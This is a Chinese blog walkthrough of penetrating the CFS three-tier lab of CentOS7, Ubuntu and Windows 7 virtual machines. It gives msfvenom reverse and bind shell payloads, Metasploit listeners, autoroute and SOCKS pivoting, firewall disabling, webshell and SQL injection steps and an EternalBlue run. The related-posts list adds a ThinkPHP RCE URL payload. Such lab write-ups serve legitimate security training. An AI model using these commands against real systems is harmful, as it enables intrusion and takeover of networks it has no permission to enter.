cfs三层靶机——内网渗透

于 2024-09-09 21:34:03 发布
阅读量778 收藏 18
点赞数 15
分类专栏: 内网渗透 文章标签: 内网 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74342020/article/details/142069296
版权

目录

1、环境地址

2、安装教程

3、配置虚拟机网卡

4、网络拓扑

5、安装宝塔

6、渗透测试

7、CentOS7

8、ubuntu

1、生成木马并上传

2、在kali上开启监听

3、回到蚁剑,运行木马

4、制作跳板

1、添加路由

2、查看路由

3、配置代理

4、配置kali的代理,新打开一个终端

5、进行主机扫描与端口扫描

6、给kali的浏览器配置代理

5、访问web页面

6、用dirsearch来探测敏感目录

7、sql注入

8、写入一句话木马

9、新打开一个蚁剑,设置代理

10、拿到ubuntu的webshell

11、制作跳板

9、windows7

1、环境地址

Ubuntu:原版软件 (itellyouhttps://next.itellyou.cn/Original/#cbp=Product?ID=deb4715d-5e52-ea11-bd34-b025aa28351d.cn)

CentOS7:centos-7-isos-x86_64安装包下载_开源镜像站-阿里云 (aliyun.com)

win7:MSDN, 我告诉你 - 做一个安静的工具站 (itellyou.cn)

2、安装教程

CentOS7:超详细的CentOS7的下载安装配置教程_centos7下载-CSDN博客

Ubuntu:Ubuntu 24.04 Server安装流程-CSDN博客

3、配置虚拟机网卡

设置虚拟机网卡(新建两个仅主机模式的网卡)

VMnet9: 子网IP:192.168.22.0 子网掩码:255.255.255.0

VMnet10: 子网IP:192.168.33.0 子网掩码:255.255.255.0

三个虚拟机的网卡配置

虚拟机网卡IP显示

CentOS7

Ubuntu

Windows7

4、网络拓扑

5、安装宝塔

centos7

url=https://download.bt.cn/install/install_lts.sh;if [ -f /usr/bin/curl ];then curl -sSO $url;else wget -O install_lts.sh $url;fi;bash install_lts.sh ed8484bec

https://192.168.220.135:28464/

oz0nkb5d

3abd49f2

ubuntu

wget -O install.sh https://download.bt.cn/install/install_lts.sh && sudo bash install.sh ed8484bec

https://192.168.22.131:22929/

0owrn5te

00df1bf8

6、渗透测试

给定域名

CentOS7 http://192.168.220.135/public/

Ubuntu http://192.168.22.131/upload/

7、CentOS7

1、用nmap扫描ip,看到80端口开放

nmap 192.168.220.135

2、访问web页面

3、看到明显的thinkphp框架,直接用历史漏洞poc干

4、打开我们的脚本

输入目标url,点击检测,发现thinkphp的版本,这里直接上传木马

5、直接用webshell工具连接

如果执行命令时,出现ret=127,是因为php禁用执行命令的函数,打开php的配置文件,

例如:vim /www/server/php/56/etc/php.ini ,这里用自己网站的php版本

查找disable_functions,删除里面的函数

重启php

进行基础的查询

可以看到这台centos7有两张网卡

8、ubuntu

1、生成木马并上传

1、蚁剑当跳板比较麻烦,所以用kali的msf生成木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.220.128 LPORT=6666 -f elf > shell.elf

ip换成自己kali的ip

2、生成的木马在当前路径下,然后打开蚁剑,上传文件,选择刚才生成的木马,

在蚁剑的终端查看:

ls

增加执行权限:

chmod a+x shell.elf

2、在kali上开启监听

1.进入msf:

msfconsole

2.进入监听模块

use exploit/multi/handler

3.设置payload,极其参数

set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.220.128
set lport 6666

4.运行

run

3、回到蚁剑,运行木马
./shell.elf

回到kali,看到已经反弹回来了

查看当前用户

getuid

查看网段

ifconfig

看到还有22这个网段

因为不在同一网段,kali不能连接到,所以把这个靶机当做跳板来渗透

4、制作跳板
1、添加路由

添加去往22段的路由

run autoroute -s 192.168.22.0/24

2、查看路由
run autoroute -p

这时候就伪造好了

使用background命令将meterpreter终端隐藏在后台

background
3、配置代理

配置代理,并设置参数

use auxiliary/server/socks_proxy
set srvport 2222
run

4、配置kali的代理,新打开一个终端
vi /etc/proxychains4.conf
socks5 192.168.220.128 2222

保存退出

Esc   :wq
5、进行主机扫描与端口扫描
proxychains4 nmap -Pn -sT 192.168.22.0/24
扫描到存活主机后,对指定ip扫端口
proxychains4 nmap 192.168.22.131

用代理进行nmap扫描的时候要禁ping扫描,因为ping不能用代理

6、给kali的浏览器配置代理

打开浏览器,可以用插件,也可以用浏览器自带的

拉到最下面选择


5、访问web页面

6、用dirsearch来探测敏感目录

找到robots.txt目录,进去看看

找到后台目录,可以试试爆破

7、sql注入

使用sqlmap跑,跑出账号密码,登录后台

8、写入一句话木马

9、新打开一个蚁剑,设置代理


10、拿到ubuntu的webshell

11、制作跳板
proxychains4 msfconsole

开启监听

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.131
set lport 5555
run

因为他不出网,只能我们去连接他,所以要生成一个正向连接的木马

生成一个正向连接木马,在当前目录下

msfvenom -p linux/x64/meterpreter/bind_tcp lport=5555 -f elf >test.elf

上传木马,并运行

chmod a+x test.elf
​
./test.elf

关闭ubuntu的防火墙

ufw disable

挂路由

run autoroute -s 192.168.22.0/24
background

切换proxychains4 的代理

use auxiliary/server/socks_proxy
set srvport 3333
run
vi /etc/proxychains4.conf
socks5 192.168.220.128 3333

9、windows7

永恒之蓝,开打,教程之前的博客有,只是在开启msf的时候要用代理,设置payload的时候,要用正向连接,因为win7不出网。

proxychains4 msfconsole
search ms17_010
use 0
set rhost 192.168.33.129
set payload windows/x64/meterpreter/bind_tcp
run

月敛苏时意
关注
  • 15
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试——CFS三层靶机渗透
抚琴
01-29 2232
是样一个逻辑 nmap信息收集: nmap -T4 -O 192.168.1.107 http://192.168.1.107/public/ 看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞 payload: http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&var.
内网安全——域横向内网漫游Socks代理隧道技术
世间繁华梦一出
08-06 561
内网漫游——内网穿透Socks代理技术内网穿透Ngrok测试演示——两个内网通讯上线内网穿透Frp自建跳板测试——两个内网通讯上线CFS三层内网漫游安全测试演练——某CTF线下2019 内网穿透Ngrok测试演示——两个内网通讯上线 Ngrok代理工具的作用就是(如下图)在两个不同内网的主机之间的外网提供一台服务器, 内网穿透Frp自建跳板测试——两个内网通讯上线 CFS三层内网漫游安全测试演练——某CTF线下2019 ...
CFS三层靶机web——内网渗透
m0_63421985的博客
10-10 289
路由还有一个缺陷,它只能在这个msf建立的会话上使用,假如我们新开一个终端使用nmap扫描,还是扫不到,所以使用msf的代理配置,当然msf有自己的代理模块,就是 auxiliary/server/socks_proxy ,我们先来开启代理服务。现在的环境是我们只有对方主机的ip,其他什么也不知道,使用nmap对对方主机进行扫描,通过探测到的端口得知对方开启了什么服务。msf创建一个后门,就是在桌面创建一个elf格式的木马,再开启监听,通过刚才蚂剑上传上去,再直接控制终端他的终端运行这个木马即可监听到。
【VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
【VulHub靶场】之CFS三层靶机内网渗透
weixin_51519028的博客
10-21 1768
msf配置代理的实操
内网安全——域横向内网漫游
qq_27862405的博客
05-06 491
三层内网漫游安全测试
小迪渗透&内网渗透(玖)
weixin_41665162的博客
09-04 4670
文章目录64. 域环境&工作组&局域网方针(65-72) 64. 域环境&工作组&局域网方针(65-72)
内网安全】域横向内网漫游Socks代理隧道技术
_Co1a
09-21 2785
代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题(比如对方在内网,你也在内网,这时候两个内网实现通信就必须要经过代理才能实现,常见工具有frp、ngrok和ew等,ew(earthworm已经停止更新了,就不演示)),和一些防火墙的拦截 隧道主要是一些安全设备和流量监控设备上的拦截问题 代理主要解决的是三种问题:内网主机有外网,内网有过滤有一些防火墙问题、内网里面无外网 必要基础知识点: 1.内外网简单知识 内网ip地址是私有ip地址(10/8, 172.16/1...
内网安全“小迪安全课堂笔记”域横向
weixin_42902126的博客
05-09 3877
内网安全内网安全-域环境&工作组&局域网探针方案基本认知域环境与工作组的区别环境靶机案例 1-基本信息收集操作演示案例 2-网络信息收集操作演示案例 3-用户信息收集操作演示案例 4-凭据信息收集操作演示计算机用户 HASH,明文获取-mimikatz(win),mimipenguin(linux)计算机各种协议服务口令获取-LaZagne(all),XenArmor(win)案例 5-探针主机域控架构服务操作演示涉及资源域横向批量at&schtasks&impacket 内
Cfs三层靶机内网渗透模拟
weixin_68210863的博客
10-23 1032
cfs三层靶机渗透详细过程
渗透测试——CFS三层靶机渗透搭建手册
抚琴
01-29 1232
搭建手册: 1、网络搭建: kali ping同Target1 Target2 ping同Target3 Target1 Target2 Target3 默认密码 teamssix.com 2、宝塔搭建 启动命令: /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 忘记密码: 恢复默认 bt default 如果无法访问 新建站点 到这里环境就搭建好了 ...
【续】CFS三层靶机中的Flag位置及其获取
TeamsSix 的 CSDN 空间
10-21 1785
0x00 前言 最近写了一篇《CFS三层靶机搭建及其内网渗透》的文章,里面满满的干货,本篇文章需要结合《CFS三层靶机搭建及其内网渗透》一起看,这篇文章可以在本文底部找到阅读链接。 0x01 Target1 1、系统根目录下 2、网站根目录下 3、网站robots.txt文件中 0x02 Target2 1、系统根目录下 2、日志文件中 3、passwd文件中 4、crontab文件中...
CSF三层主机:渗透测试靶场笔记
Zeker62的博客
03-27 5776
测试的时候会出现各种错误,存在重新搭建环境的情况,如有IP对不上号,请尽量忽略。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 904
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
如何启动网络安全计划:首先要做的事情
最新发布
网络研究观
09-07 909
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1724
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-04 1541
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-05 1298
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
cfs内网渗透centos7靶机下载
12-05
为了在CentOS 7靶机上进行内网渗透,我们可以通过开放80端口并访问网站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机的网站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80端口号,访问网站。 3. 在网站上查找需要下载的文件,并下载到本地。 另外,我们还可以使用msfvenom生成一个meterpreter反向Shell,然后将其上传到CentOS 7靶机上进行下载。具体步骤如下: 1. 在Kali Linux上使用msfvenom生成一个meterpreter反向Shell,命令如下: ```shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> SessionCommunicationTimeout=0 SessionExpiration=0 -f elf > muma.elf ``` 其中,`<attacker IP>`和`<attacker port>`分别为攻击者的IP地址和端口号,`muma.elf`为生成的反向Shell文件名。 2. 将生成的反向Shell文件上传到CentOS 7靶机上,可以使用scp命令,命令如下: ```shell scp muma.elf <username>@<target IP>:<path> ``` 其中,`<username>`为CentOS 7靶机上的用户名,`<target IP>`为CentOS 7靶机的IP地址,`<path>`为上传文件的路径。 3. 在CentOS 7靶机上运行反向Shell文件,命令如下: ```shell ./muma.elf ``` 运行后,反向Shell会连接到攻击者的机器,攻击者可以通过反向Shell进行下载等操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值